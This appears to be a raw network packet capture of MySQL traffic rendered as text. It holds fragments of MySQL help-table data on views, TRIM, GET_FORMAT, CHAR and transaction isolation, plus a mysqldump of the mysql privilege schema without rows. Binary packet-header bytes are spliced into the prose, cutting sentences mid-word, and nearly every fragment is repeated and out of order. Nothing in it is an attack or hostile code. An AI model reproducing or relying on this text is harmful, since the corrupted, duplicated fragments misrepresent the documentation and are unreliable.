3PЖ M  )ause.\n\n --- ALGORITHM = MERGE is specified for a view that can be processed only\nwith a temporary table. In this case, MySQL generates a warning and sets\nthe algorithm to UNDEFINED.\n\n\n\nAs mentioned earlier, MERGE is handled by merging corresponding parts\nof a view definition into the statement that refers to the view. The\nfollowing examples briefly illustrate how the MERGE algorithm works.\nThe examples assume that there is a view v_merge that has this\ndefinition:\n\nCREATE ALGORITHM = MERGE VIEW v_merge (vc1, vc2) AS\nSELECT c1, c2 FROM t WHERE c3 > 100;\n\nExample 1: Suppose that we issue this statement:\n\nSELECT * FROM v_merge;\n\nMySQL handles the statement as follows:\n\n\n --- v_merge becomes t\n\n --- * becomes vc1, vc2, which corresponds to c1, c2\n\n --- The view WHERE clause is added\n\n\nThe resulting statement to be executed becomes:\n\nSELECT c1, c2 FROM t WHERE c3 > 100;\n\nExample 2: Suppose that we issue this statement:\n\nSELECT * FROM v_merge WHERE vc1 < 100;\n\nThis statement is handled similarly to the previous one, except that\nvc1 < 100 becomes c1 < 100 and the view WHERE clause is\nadded to the statement WHERE clause using an AND connective\n(and parentheses are added to make sure the parts of the clause are executed\nwith correct CbbBi0`ET@/p܂Ao0E<@?  3P՞ :  )precedence). The resulting statement to be executed becomes:\n\nSELECT c1, c2 FROM t WHERE (c3 > 100) AND (c1 < 100);\n\nEffectively, the statement to be executed has a WHERE clause of this\nform:\n\nWHERE (select WHERE) AND (view WHERE)\n\nThe MERGE algorithm requires a one-to relationship between the rows\nin the view and the rows in the underlying table. If this relationship does\nnot hold, a temporary table must be used instead. Lack of a one-to-one\nrelationship occurs if the view contains any of a number of constructs:\n\n\n --- Aggregate functions (SUM(), MIN(), MAX(),\nCOUNT(), and so forth)\n\n --- DISTINCT\n\n --- GROUP BY\n\n --- HAVING\n\n --- UNION or UNION ALL\n\n --- Refers only to literal values (in this case, there is no underlying table)\n\n\nSome views are updatable. That is, you can use them in statements such as\nUPDATE, DELETE, or INSERT to update the contents of the\nunderlying table. For a view to be updatable, there must be a one-to\nrelationship between the rows in the view and the rows in the underlying\ntable. There are also certain other constructs that make a view\nnon-updatable. To be more specific, a view is not updatable if it contains\nany of the following:\n\n\n --- Aggregate functions (SUM(), MIN(), MAX(),\nCOUNT(), and so forthCbb0`BiET@/Ԁo0SE<@@  3P՞ :  )precedence). The resulting statement to be executed becomes:\n\nSELECT c1, c2 FROM t WHERE (c3 > 100) AND (c1 < 100);\n\nEffectively, the statement to be executed has a WHERE clause of this\nform:\n\nWHERE (select WHERE) AND (view WHERE)\n\nThe MERGE algorithm requires a one-to relationship between the rows\nin the view and the rows in the underlying table. If this relationship does\nnot hold, a temporary table must be used instead. Lack of a one-to-one\nrelationship occurs if the view contains any of a number of constructs:\n\n\n --- Aggregate functions (SUM(), MIN(), MAX(),\nCOUNT(), and so forth)\n\n --- DISTINCT\n\n --- GROUP BY\n\n --- HAVING\n\n --- UNION or UNION ALL\n\n --- Refers only to literal values (in this case, there is no underlying table)\n\n\nSome views are updatable. That is, you can use them in statements such as\nUPDATE, DELETE, or INSERT to update the contents of the\nunderlying table. For a view to be updatable, there must be a one-to\nrelationship between the rows in the view and the rows in the underlying\ntable. There are also certain other constructs that make a view\nnon-updatable. To be more specific, a view is not updatable if it contains\nany of the following:\n\n\n --- Aggregate functions (SUM(), MIN(), MAX(),\nCOUNT(), and so forthCbbBi0`ET@/p܂Ao0E<@?  3Pڦ   ))\n\n --- DISTINCT\n\n --- GROUP BY\n\n --- HAVING\n\n --- UNION or UNION ALL\n\n --- Subquery in the select list\n\n --- Join\n\n --- Non-updatable view in the FROM clause\n\n --- A subquery in the WHERE clause that refers to a table in the\nFROM clause\n\n --- Refers only to literal values (in this case, there is no underlying table to\nupdate)\n\n --- ALGORITHM = TEMPTABLE (use of a temporary table always makes a view\nnon-updatable)\n\n\nWith respect to insertability (being updatable with INSERT\nstatements), an updatable view is insertable if it also satisfies these\nadditional requirements for the view columns:\n\n\n --- There must be no duplicate view column names.\n\n --- The view must contain all columns in the base table that do not have a\ndefault value.\n\n --- The view columns must be simple column references and not derived columns.\nA derived column is one that is not a simple column reference but is derived\nfrom an expression. These are examples of derived columns:\n\n3.14159\ncol1 + 3\nUPPER(col2)\ncol3 / col4\n(subquery)\n\n\nA view that has a mix of simple column references and derived columns is not\ninsertable, but it can be updatable if you update only those columns that\nare not derived. Consider this view:\n\nCREATE VIEW v AS SELECT col1, 1 CZZBi0`EL@/܂Sŀo0E4@? 3 PbZ)P )C bb0`BiET@/Ԁo0SE<@@  3Pڦ   ))\n\n --- DISTINCT\n\n --- GROUP BY\n\n --- HAVING\n\n --- UNION or UNION ALL\n\n --- Subquery in the select list\n\n --- Join\n\n --- Non-updatable view in the FROM clause\n\n --- A subquery in the WHERE clause that refers to a table in the\nFROM clause\n\n --- Refers only to literal values (in this case, there is no underlying table to\nupdate)\n\n --- ALGORITHM = TEMPTABLE (use of a temporary table always makes a view\nnon-updatable)\n\n\nWith respect to insertability (being updatable with INSERT\nstatements), an updatable view is insertable if it also satisfies these\nadditional requirements for the view columns:\n\n\n --- There must be no duplicate view column names.\n\n --- The view must contain all columns in the base table that do not have a\ndefault value.\n\n --- The view columns must be simple column references and not derived columns.\nA derived column is one that is not a simple column reference but is derived\nfrom an expression. These are examples of derived columns:\n\n3.14159\ncol1 + 3\nUPPER(col2)\ncol3 / col4\n(subquery)\n\n\nA view that has a mix of simple column references and derived columns is not\ninsertable, but it can be updatable if you update only those columns that\nare not derived. Consider this view:\n\nCREATE VIEW v AS SELECT col1, 1 CZZ0`BiEL@/go0AE4@@ 3 PbZ)P )CԻbbBi0`ET@/أ  o0E< @?z  3PZ{ V> a)] SET latin1 */; USE `mysql`; -- -- Table structure for table `columns_priv` -- DROP TABLE IF EXISTS `columns_priv`; CREATE TABLE `columns_priv` ( `Host` char(60) character set latin1 collate latin1_bin NOT NULL default '', `Db` char(64) character set latin1 collate latin1_bin NOT NULL default '', `User` char(16) character set latin1 collate latin1_bin NOT NULL default '', `Table_name` char(64) character set latin1 collate latin1_bin NOT NULL default '', `Column_name` char(64) character set latin1 collate latin1_bin NOT NULL default '', `Timestamp` timestamp NOT NULL default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP, `Column_priv` set('Select','Insert','Update','References') NOT NULL default '', PRIMARY KEY (`Host`,`Db`,`User`,`Table_name`,`Column_name`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 COMMENT='Column privileges'; -- -- Dumping data for table `columns_priv` -- /*!40000 ALTER TABLE `columns_priv` DISABLE KEYS */; LOCK TABLES `columns_priv` WRITE; UNLOCK TABLES; /*!40000 ALTER TABLE `columns_priv` ENABLE KEYS */; -- -- Table structure for table `db` -- DROP TABLE IF EXISTS `db`; CREATE TABLE `db` ( `Host` char(60) character set latin1 collate latin1_bin NOT NULL default '', `Db` char(64) character set latin1 collate latin1_bin NOT Cbb0`BiET@/Ԁo0SE< @@z  3PZ{ V> a)] SET latin1 */; USE `mysql`; -- -- Table structure for table `columns_priv` -- DROP TABLE IF EXISTS `columns_priv`; CREATE TABLE `columns_priv` ( `Host` char(60) character set latin1 collate latin1_bin NOT NULL default '', `Db` char(64) character set latin1 collate latin1_bin NOT NULL default '', `User` char(16) character set latin1 collate latin1_bin NOT NULL default '', `Table_name` char(64) character set latin1 collate latin1_bin NOT NULL default '', `Column_name` char(64) character set latin1 collate latin1_bin NOT NULL default '', `Timestamp` timestamp NOT NULL default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP, `Column_priv` set('Select','Insert','Update','References') NOT NULL default '', PRIMARY KEY (`Host`,`Db`,`User`,`Table_name`,`Column_name`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 COMMENT='Column privileges'; -- -- Dumping data for table `columns_priv` -- /*!40000 ALTER TABLE `columns_priv` DISABLE KEYS */; LOCK TABLES `columns_priv` WRITE; UNLOCK TABLES; /*!40000 ALTER TABLE `columns_priv` ENABLE KEYS */; -- -- Table structure for table `db` -- DROP TABLE IF EXISTS `db`; CREATE TABLE `db` ( `Host` char(60) character set latin1 collate latin1_bin NOT NULL default '', `Db` char(64) character set latin1 collate latin1_bin NOT CQbbBi0`ET@/p܂Ao0E<@?  3P߮ `  )AS col2 FROM t;\n\nThis view is not insertable because col2 is derived from an\nexpression. But it is updatable if the update does not try to update\ncol2. This update is allowable:\n\nUPDATE v SET col1 = 0;\n\nThis update is not allowable because it attempts to update a derived column:\n\nUPDATE v SET col2 = 0;\n\nIt is sometimes possible for a multiple-table view to be updatable, assuming\nthat it can be processed with the MERGE algorithm. For this to work,\nthe view must use an inner join (not an outer join or a UNION). Also,\nonly a single table in the view definition can be updated, so the SET\nclause must name only columns from one of the tables in the view. Views\nthat use UNION ALL are disallowed even though they might be\ntheoretically updatable, because the implementation uses temporary tables to\nprocess them.\n\n\nFor a multiple-table updatable view, INSERT can work if it inserts into a\nsingle table. DELETE is not supported.\n\nThe WITH CHECK OPTION clause can be given for an updatable view to\nprevent inserts or updates to rows except those for which the WHERE\nclause in the select_statement is true.\n','',''),(359,'TRIM',23,' TRIM([{BOTH | LEADING | TRAILING} [remstr] FROM] str)\n TRIM(remstr FROM] str)\nReturns the string str with all remstr prCmbb0`BiET@/Ԁo0SE<@@  3P߮ `  )AS col2 FROM t;\n\nThis view is not insertable because col2 is derived from an\nexpression. But it is updatable if the update does not try to update\ncol2. This update is allowable:\n\nUPDATE v SET col1 = 0;\n\nThis update is not allowable because it attempts to update a derived column:\n\nUPDATE v SET col2 = 0;\n\nIt is sometimes possible for a multiple-table view to be updatable, assuming\nthat it can be processed with the MERGE algorithm. For this to work,\nthe view must use an inner join (not an outer join or a UNION). Also,\nonly a single table in the view definition can be updated, so the SET\nclause must name only columns from one of the tables in the view. Views\nthat use UNION ALL are disallowed even though they might be\ntheoretically updatable, because the implementation uses temporary tables to\nprocess them.\n\n\nFor a multiple-table updatable view, INSERT can work if it inserts into a\nsingle table. DELETE is not supported.\n\nThe WITH CHECK OPTION clause can be given for an updatable view to\nprevent inserts or updates to rows except those for which the WHERE\nclause in the select_statement is true.\n','',''),(359,'TRIM',23,' TRIM([{BOTH | LEADING | TRAILING} [remstr] FROM] str)\n TRIM(remstr FROM] str)\nReturns the string str with all remstr prCϼZZBi0`EL@/܂Sŀo0E4@? 3 Pbj)F )CZZ0`BiEL@/go0AE4@@ 3 Pbj)F )CbbBi0`ET@/p܂Ao0E<@?  3P䶞   )efixes and/or suffixes\nremoved. If none of the specifiers BOTH, LEADING, or\nTRAILING is given, BOTH is assumed. If remstr is optional\nand not specified, spaces are removed.\n','mysql> SELECT TRIM(\' bar \');\n -> \'bar\'\nmysql> SELECT TRIM(LEADING \'x\' FROM \'xxxbarxxx\');\n -> \'barxxx\'\nmysql> SELECT TRIM(BOTH \'x\' FROM \'xxxbarxxx\');\n -> \'bar\'\nmysql> SELECT TRIM(TRAILING \'xyz\' FROM \'barxxyz\');\n -> \'barx\'',''),(360,'IS',26,' IS boolean_value\n IS NOT boolean_value\nTests whether a value against a boolean value, where boolean_value can\nbe TRUE, FALSE, or UNKNOWN.\n','mysql> SELECT 1 IS TRUE, 0 IS FALSE, NULL IS UNKNOWN;\n -> 1, 1, 1\nmysql> SELECT 1 IS NOT UNKNOWN, 0 IS NOT UNKNOWN, NULL IS NOT UNKNOWN;\n -> 1, 1, 0',''),(361,'GET_FORMAT',14,' GET_FORMAT(DATE|TIME|DATETIME, \'EUR\'|\'USA\'|\'JIS\'|\'ISO\'|\'INTERNAL\')\nReturns a format string. This function is useful in combination with the\nDATE_FORMAT() and the STR_TO_DATE() functions.\nThe three possible values for the first argument\nand the five possible values for the second argument result in 15 possible\nformat strings (for the specifiers used, see the table in the\nDATE_FORMAT() function description).\n Function Call Result\n GETCbb0`BiET@/Ԁo0SE<@@  3P䶞   )efixes and/or suffixes\nremoved. If none of the specifiers BOTH, LEADING, or\nTRAILING is given, BOTH is assumed. If remstr is optional\nand not specified, spaces are removed.\n','mysql> SELECT TRIM(\' bar \');\n -> \'bar\'\nmysql> SELECT TRIM(LEADING \'x\' FROM \'xxxbarxxx\');\n -> \'barxxx\'\nmysql> SELECT TRIM(BOTH \'x\' FROM \'xxxbarxxx\');\n -> \'bar\'\nmysql> SELECT TRIM(TRAILING \'xyz\' FROM \'barxxyz\');\n -> \'barx\'',''),(360,'IS',26,' IS boolean_value\n IS NOT boolean_value\nTests whether a value against a boolean value, where boolean_value can\nbe TRUE, FALSE, or UNKNOWN.\n','mysql> SELECT 1 IS TRUE, 0 IS FALSE, NULL IS UNKNOWN;\n -> 1, 1, 1\nmysql> SELECT 1 IS NOT UNKNOWN, 0 IS NOT UNKNOWN, NULL IS NOT UNKNOWN;\n -> 1, 1, 0',''),(361,'GET_FORMAT',14,' GET_FORMAT(DATE|TIME|DATETIME, \'EUR\'|\'USA\'|\'JIS\'|\'ISO\'|\'INTERNAL\')\nReturns a format string. This function is useful in combination with the\nDATE_FORMAT() and the STR_TO_DATE() functions.\nThe three possible values for the first argument\nand the five possible values for the second argument result in 15 possible\nformat strings (for the specifiers used, see the table in the\nDATE_FORMAT() function description).\n Function Call Result\n GETCbbBi0`ET@/p܂Ao0E<@?  3P龞 iL  )_FORMAT(DATE,\'USA\') \'%m.%d.%Y\'\n GET_FORMAT(DATE,\'JIS\') \'%Y-%m-%d\'\n GET_FORMAT(DATE,\'ISO\') \'%Y-%m-%d\'\n GET_FORMAT(DATE,\'EUR\') \'%d.%m.%Y\'\n GET_FORMAT(DATE,\'INTERNAL\') \'%Y%m%d\'\n GET_FORMAT(DATETIME,\'USA\') \'%Y-%m-%d-%H.%i.%s\'\n GET_FORMAT(DATETIME,\'JIS\') \'%Y-%m-%d %H:%i:%s\'\n GET_FORMAT(DATETIME,\'ISO\') \'%Y-%m-%d %H:%i:%s\'\n GET_FORMAT(DATETIME,\'EUR\') \'%Y-%m-%d-%H.%i.%s\'\n GET_FORMAT(DATETIME,\'INTERNAL\') \'%Y%m%d%H%i%s\'\n GET_FORMAT(TIME,\'USA\') \'%h:%i:%s %p\'\n GET_FORMAT(TIME,\'JIS\') \'%H:%i:%s\'\n GET_FORMAT(TIME,\'ISO\') \'%H:%i:%s\'\n GET_FORMAT(TIME,\'EUR\') \'%H.%i.%S\'\n GET_FORMAT(TIME,\'INTERNAL\') \'%H%i%s\'\n \nISO format is ISO 9075, not ISO 8601.\n\nAs of MySQL 4.1.4, TIMESTAMP can also be used;\nGET_FORMAT() returns the same values as for DATETIME.\n','mysql> SELECT DATE_FORMAT(\'2003-10-03\',GET_FORMAT(DATE,\'EUR\'));\n -> \'03.10.2003\'\nmysql> SELECT STR_TO_DATE(\'10.31.2003\',GET_FORMAT(DATE,\'USA\'));\n -> 2003-10-31\n@c Following is commented out because not yet implemented\n@c mysql> SET DATE_FORMAT=GET_FORMAT(DATE, \'USA\'); SELECT \'2003-10-31\';\n@c -> 10-31-2003',''),(362,'TINYBLOB',1,' TINYBLOB\n\nA BLOB column with a CZZBi0`EL@/܂Sŀo0E4@? 3 Pbz)< )Cbb0`BiET@/Ԁo0SE<@@  3P龞 iL  )_FORMAT(DATE,\'USA\') \'%m.%d.%Y\'\n GET_FORMAT(DATE,\'JIS\') \'%Y-%m-%d\'\n GET_FORMAT(DATE,\'ISO\') \'%Y-%m-%d\'\n GET_FORMAT(DATE,\'EUR\') \'%d.%m.%Y\'\n GET_FORMAT(DATE,\'INTERNAL\') \'%Y%m%d\'\n GET_FORMAT(DATETIME,\'USA\') \'%Y-%m-%d-%H.%i.%s\'\n GET_FORMAT(DATETIME,\'JIS\') \'%Y-%m-%d %H:%i:%s\'\n GET_FORMAT(DATETIME,\'ISO\') \'%Y-%m-%d %H:%i:%s\'\n GET_FORMAT(DATETIME,\'EUR\') \'%Y-%m-%d-%H.%i.%s\'\n GET_FORMAT(DATETIME,\'INTERNAL\') \'%Y%m%d%H%i%s\'\n GET_FORMAT(TIME,\'USA\') \'%h:%i:%s %p\'\n GET_FORMAT(TIME,\'JIS\') \'%H:%i:%s\'\n GET_FORMAT(TIME,\'ISO\') \'%H:%i:%s\'\n GET_FORMAT(TIME,\'EUR\') \'%H.%i.%S\'\n GET_FORMAT(TIME,\'INTERNAL\') \'%H%i%s\'\n \nISO format is ISO 9075, not ISO 8601.\n\nAs of MySQL 4.1.4, TIMESTAMP can also be used;\nGET_FORMAT() returns the same values as for DATETIME.\n','mysql> SELECT DATE_FORMAT(\'2003-10-03\',GET_FORMAT(DATE,\'EUR\'));\n -> \'03.10.2003\'\nmysql> SELECT STR_TO_DATE(\'10.31.2003\',GET_FORMAT(DATE,\'USA\'));\n -> 2003-10-31\n@c Following is commented out because not yet implemented\n@c mysql> SET DATE_FORMAT=GET_FORMAT(DATE, \'USA\'); SELECT \'2003-10-31\';\n@c -> 10-31-2003',''),(362,'TINYBLOB',1,' TINYBLOB\n\nA BLOB column with a CZZ0`BiEL@/go0AE4@@ 3 Pbz)< )CbbBi0`ET@/p܂Ao0E<@?  3Pƞ -U  )maximum length of 255\n(2^8 - 1) bytes.\n','',''),(363,'SAVEPOINT',10,'SAVEPOINT identifier\nROLLBACK TO SAVEPOINT identifier\n\nStarting from MySQL 4.0.14 and 4.1.1, InnoDB supports the SQL statements\nSAVEPOINT and ROLLBACK TO SAVEPOINT.\n','',''),(364,'IF',9,' IF(expr1,expr2,expr3)\nIf expr1 is TRUE (expr1 <> 0 and expr1 <> NULL) then\nIF() returns expr2, else it returns expr3.\nIF() returns a numeric or string value, depending on the context\nin which it is used.\n','mysql> SELECT IF(1>2,2,3);\n -> 3\nmysql> SELECT IF(1<2,\'yes\',\'no\');\n -> \'yes\'\nmysql> SELECT IF(STRCMP(\'test\',\'test1\'),\'no\',\'yes\');\n -> \'no\'',''),(365,'PURGE',6,'','PURGE MASTER LOGS TO \'mysql-bin.010\';\nPURGE MASTER LOGS BEFORE \'2003-04-02 22:46:26\';',''),(366,'USER',25,' USER()\n\nReturns the current MySQL username and hostname.\n','mysql> SELECT USER();\n -> \'davida@localhost\'',''),(367,'MPOINTFROMWKB',13,' MPointFromWKB(wkb[,srid])\n MultiPointFromWKB(wkb[,srid])\nConstructs a MULTIPOINT value using its WKB representation and SRID.\n','',''),(368,'ALTER TABLE',28,'ALTER TABLE allows you to change the structure of an existing table.\nFor example, you can add or delete columns, create or destroy indexes, change\nthe type of existing columnCZZBi0`EL@/Ao0E4(@?H  PPZ"lA5 e`QC bb0`BiET@/Ԁo0SE<@@  3Pƞ -U  )maximum length of 255\n(2^8 - 1) bytes.\n','',''),(363,'SAVEPOINT',10,'SAVEPOINT identifier\nROLLBACK TO SAVEPOINT identifier\n\nStarting from MySQL 4.0.14 and 4.1.1, InnoDB supports the SQL statements\nSAVEPOINT and ROLLBACK TO SAVEPOINT.\n','',''),(364,'IF',9,' IF(expr1,expr2,expr3)\nIf expr1 is TRUE (expr1 <> 0 and expr1 <> NULL) then\nIF() returns expr2, else it returns expr3.\nIF() returns a numeric or string value, depending on the context\nin which it is used.\n','mysql> SELECT IF(1>2,2,3);\n -> 3\nmysql> SELECT IF(1<2,\'yes\',\'no\');\n -> \'yes\'\nmysql> SELECT IF(STRCMP(\'test\',\'test1\'),\'no\',\'yes\');\n -> \'no\'',''),(365,'PURGE',6,'','PURGE MASTER LOGS TO \'mysql-bin.010\';\nPURGE MASTER LOGS BEFORE \'2003-04-02 22:46:26\';',''),(366,'USER',25,' USER()\n\nReturns the current MySQL username and hostname.\n','mysql> SELECT USER();\n -> \'davida@localhost\'',''),(367,'MPOINTFROMWKB',13,' MPointFromWKB(wkb[,srid])\n MultiPointFromWKB(wkb[,srid])\nConstructs a MULTIPOINT value using its WKB representation and SRID.\n','',''),(368,'ALTER TABLE',28,'ALTER TABLE allows you to change the structure of an existing table.\nFor example, you can add or delete columns, create or destroy indexes, change\nthe type of existing columnCZZ0`BiEL@/o0  E4(@@G  PPZ"lA5 e`QCfZZBi0`EL@/$T<o0E4@?o  Pճ㝯8X A 1U7=xCZZʪBiEL@/o0o0oE4@@o  Pճ㝯8X ` 1U7=xCRbbBi0`ET@/p܂Ao0E<`@?U  3Pόu}U X  )ld a variable amount of\ndata. The four BLOB types, TINYBLOB, BLOB,\nMEDIUMBLOB, and LONGBLOB, differ only in the maximum length of\nthe values they can hold.\n','',''),(336,'PASSWORD',17,'','mysql> SELECT PASSWORD(\'badpwd\');\n -> \'7f84554057dd964b\'',''),(337,'CHAR',1,' [NATIONAL] CHAR(M) [BINARY | ASCII | UNICODE]\n\nA fixed-length string that is always right-padded with spaces to the\nspecified length when stored. M represents the column length. The\nrange of M is 0 to 255 characters (1 to 255 prior to MySQL 3.23).\n\nNote: Trailing spaces are removed when CHAR values are\nretrieved.\n\nFrom MySQL 4.1.0 to 5.0.2, a CHAR column with a length specification\ngreater than 255 is converted to the smallest TEXT type that can hold\nvalues of the given length. For example, CHAR(500) is converted to\nTEXT, and CHAR(200000) is converted to MEDIUMTEXT.\nThis is a compatibility feature. However, this conversion causes the column\nto become a variable-length column, and also affects trailing-space removal.\n\nCHAR is shorthand for CHARACTER.\nNATIONAL CHAR (or its equivalent short form, NCHAR) is the\nstandard SQL way to define that a CHAR column should use the default\ncharacter set. This is the default in MySQL.\n\nAs of MySQL 4.1.2, the BINARY attribute is Cnbb0`BiET@/Ԁo0SE<`@@T  3Pόu}U X  )ld a variable amount of\ndata. The four BLOB types, TINYBLOB, BLOB,\nMEDIUMBLOB, and LONGBLOB, differ only in the maximum length of\nthe values they can hold.\n','',''),(336,'PASSWORD',17,'','mysql> SELECT PASSWORD(\'badpwd\');\n -> \'7f84554057dd964b\'',''),(337,'CHAR',1,' [NATIONAL] CHAR(M) [BINARY | ASCII | UNICODE]\n\nA fixed-length string that is always right-padded with spaces to the\nspecified length when stored. M represents the column length. The\nrange of M is 0 to 255 characters (1 to 255 prior to MySQL 3.23).\n\nNote: Trailing spaces are removed when CHAR values are\nretrieved.\n\nFrom MySQL 4.1.0 to 5.0.2, a CHAR column with a length specification\ngreater than 255 is converted to the smallest TEXT type that can hold\nvalues of the given length. For example, CHAR(500) is converted to\nTEXT, and CHAR(200000) is converted to MEDIUMTEXT.\nThis is a compatibility feature. However, this conversion causes the column\nto become a variable-length column, and also affects trailing-space removal.\n\nCHAR is shorthand for CHARACTER.\nNATIONAL CHAR (or its equivalent short form, NCHAR) is the\nstandard SQL way to define that a CHAR column should use the default\ncharacter set. This is the default in MySQL.\n\nAs of MySQL 4.1.2, the BINARY attribute is C@bbBi0`ET@/أ  o0E<@?  PgZ/a8 N a-''),(350,'ACOS',4,' ACOS(X)\nReturns the arc cosine of X, that is, the value whose cosine is\nX. Returns NULL if X is not in the range -1 to\n1.\n','mysql> SELECT ACOS(1);\n -> 0.000000\nmysql> SELECT ACOS(1.0001);\n -> NULL\nmysql> SELECT ACOS(0);\n -> 1.570796',''),(351,'ISOLATION',10,'SET [GLOBAL | SESSION] TRANSACTION ISOLATION LEVEL\n{ READ UNCOMMITTED | READ COMMITTED | REPEATABLE READ | SERIALIZABLE }\n\nThis statement\nsets the transaction isolation level for the next transaction, globally, or\nfor the current session.\n\nThe default behavior of SET TRANSACTION is to set the isolation level\nfor the next (not yet\nstarted) transaction. If you use the GLOBAL keyword, the statement\nsets the default transaction level globally for all new connections\ncreated from that point on. Existing connections are unaffected.\nYou need the SUPER\nprivilege to do this. Using the SESSION keyword sets the\ndefault transaction level for all future transactions performed on the\ncurrent connection.\n\nFor descriptions of each InnoDB transaction isolation level, see\n[InnoDB transaction isolation, InnoDB transaction isolation].\nInnoDB supports each of these levels\nfrom MySQL 4.0.5 on. The default level is REPEATABLE READ.\n\nYou can set the initial defaC[bb0`BiET@/4o0 E<@@  PgZ/a8 N a-''),(350,'ACOS',4,' ACOS(X)\nReturns the arc cosine of X, that is, the value whose cosine is\nX. Returns NULL if X is not in the range -1 to\n1.\n','mysql> SELECT ACOS(1);\n -> 0.000000\nmysql> SELECT ACOS(1.0001);\n -> NULL\nmysql> SELECT ACOS(0);\n -> 1.570796',''),(351,'ISOLATION',10,'SET [GLOBAL | SESSION] TRANSACTION ISOLATION LEVEL\n{ READ UNCOMMITTED | READ COMMITTED | REPEATABLE READ | SERIALIZABLE }\n\nThis statement\nsets the transaction isolation level for the next transaction, globally, or\nfor the current session.\n\nThe default behavior of SET TRANSACTION is to set the isolation level\nfor the next (not yet\nstarted) transaction. If you use the GLOBAL keyword, the statement\nsets the default transaction level globally for all new connections\ncreated from that point on. Existing connections are unaffected.\nYou need the SUPER\nprivilege to do this. Using the SESSION keyword sets the\ndefault transaction level for all future transactions performed on the\ncurrent connection.\n\nFor descriptions of each InnoDB transaction isolation level, see\n[InnoDB transaction isolation, InnoDB transaction isolation].\nInnoDB supports each of these levels\nfrom MySQL 4.0.5 on. The default level is REPEATABLE READ.\n\nYou can set the initial defaCbbBi0`ET@/p܂Ao0Eq  )c context.\n','mysql> SELECT UTC_DATE(), UTC_DATE() + 0;\n -> \'2003-08-14\', 20030814',''),(339,'DIMENSION',19,' Dimension(g)\nReturns the inherent dimension of the geometry value g. The result\ncan be -1, 0, 1, or 2. (The meaning of these values is given in\n[GIS class geometry].)\n','mysql> SELECT Dimension(GeomFromText(\'LineString(1 1,2 2)\'));\n+------------------------------------------------+\n| Dimension(GeomFromText(\'LineString(1 1,2 2)\')) |\n+------------------------------------------------+\n| 1 |\n+------------------------------------------------+',''),(340,'COUNT DISTINCT',12,' COUNT(DISTINCT expr,[expr...])\nReturns a count of the number of different non-NULL values.\n','mysql> SELECT COUNT(DISTINCT results) FROM student;',''),(341,'BIT',1,' BIT[(M)]\n\nA bit-field type. M indicates the number of bits per value, from 1 to\n64. The default is 1 if M is omitted.\n\nThis data type was added in MySQL 5.0.3 for MyISAM, and extended\nin 5.0.5 to MEMORY, InnoDB, and BDB. Before 5.0.3,\nBIT is a synonym for TINYINT(1).\n','',''),(342,'EQUALS',11,' Equals(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 is spatially equal to\ng2.\n','',''),(343,'SHOW CREATE VIEW',24,'This statement shows a CREATECbb0`BiET@/Ԁo0SEq  )c context.\n','mysql> SELECT UTC_DATE(), UTC_DATE() + 0;\n -> \'2003-08-14\', 20030814',''),(339,'DIMENSION',19,' Dimension(g)\nReturns the inherent dimension of the geometry value g. The result\ncan be -1, 0, 1, or 2. (The meaning of these values is given in\n[GIS class geometry].)\n','mysql> SELECT Dimension(GeomFromText(\'LineString(1 1,2 2)\'));\n+------------------------------------------------+\n| Dimension(GeomFromText(\'LineString(1 1,2 2)\')) |\n+------------------------------------------------+\n| 1 |\n+------------------------------------------------+',''),(340,'COUNT DISTINCT',12,' COUNT(DISTINCT expr,[expr...])\nReturns a count of the number of different non-NULL values.\n','mysql> SELECT COUNT(DISTINCT results) FROM student;',''),(341,'BIT',1,' BIT[(M)]\n\nA bit-field type. M indicates the number of bits per value, from 1 to\n64. The default is 1 if M is omitted.\n\nThis data type was added in MySQL 5.0.3 for MyISAM, and extended\nin 5.0.5 to MEMORY, InnoDB, and BDB. Before 5.0.3,\nBIT is a synonym for TINYINT(1).\n','',''),(342,'EQUALS',11,' Equals(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 is spatially equal to\ng2.\n','',''),(343,'SHOW CREATE VIEW',24,'This statement shows a CREATECbbBi0`ET@/p܂Ao0E SELECT INTERVAL(23, 1, 15, 17, 30, 44, 200);\n -> 3\nmysql> SELECT INTERVAL(10, 1, 10, 100, 1000);\n -> 2\nmysql> SELECT INTERVAL(22, 23, 30, 44, 200);\n -> 0',''),(345,'FROM_DAYS',14,' FROM_DAYS(N)\nGiven a daynumber N, returns a DATE value.\n','mysql> SELECT FROM_DAYS(729669);\n -> \'1997-10-07\'',''),(346,'BIT_COUNT',27,' BIT_COUNT(N)\nReturns the number of bits that are set in the argument N.\n','mysql> SELECT BIT_COUNT(29);\n -> 4',''),(347,'UTC_TIMESTAMP',14,' UTC_TIMESTAMP\n UTC_TIMESTAMP()\nReturns the current UTC date and time as a value in \'YYYY-MM-DD HH:MM:SS\'\nor YYYYMMDDHHMMSS format, depending on whether the function is used in\na string or numeric context.\n','mysql> SELECT UTC_TIMESTAMP(), UTC_TIMESTAMP() + 0;\n -> \'2003-08-14 18:08:04\', 20030814180804',''),(348,'+',4,' +\nAddition:\n','mysql> SELECT 3+5;\n -> 8','CZZBi0`EL@/܂Sŀo0E4\k@? 3 Pu}U\$ )Cbb0`BiET@/Ԁo0SE SELECT INTERVAL(23, 1, 15, 17, 30, 44, 200);\n -> 3\nmysql> SELECT INTERVAL(10, 1, 10, 100, 1000);\n -> 2\nmysql> SELECT INTERVAL(22, 23, 30, 44, 200);\n -> 0',''),(345,'FROM_DAYS',14,' FROM_DAYS(N)\nGiven a daynumber N, returns a DATE value.\n','mysql> SELECT FROM_DAYS(729669);\n -> \'1997-10-07\'',''),(346,'BIT_COUNT',27,' BIT_COUNT(N)\nReturns the number of bits that are set in the argument N.\n','mysql> SELECT BIT_COUNT(29);\n -> 4',''),(347,'UTC_TIMESTAMP',14,' UTC_TIMESTAMP\n UTC_TIMESTAMP()\nReturns the current UTC date and time as a value in \'YYYY-MM-DD HH:MM:SS\'\nor YYYYMMDDHHMMSS format, depending on whether the function is used in\na string or numeric context.\n','mysql> SELECT UTC_TIMESTAMP(), UTC_TIMESTAMP() + 0;\n -> \'2003-08-14 18:08:04\', 20030814180804',''),(348,'+',4,' +\nAddition:\n','mysql> SELECT 3+5;\n -> 8','CZZ0`BiEL@/go0AE4\k@@ 3 Pu}U\$ )CbbBi0`ET@/p܂Ao0E SELECT INET_NTOA(3520061480);\n -> \'209.207.224.40\'',''),(350,'ACOS',4,' ACOS(X)\nReturns the arc cosine of X, that is, the value whose cosine is\nX. Returns NULL 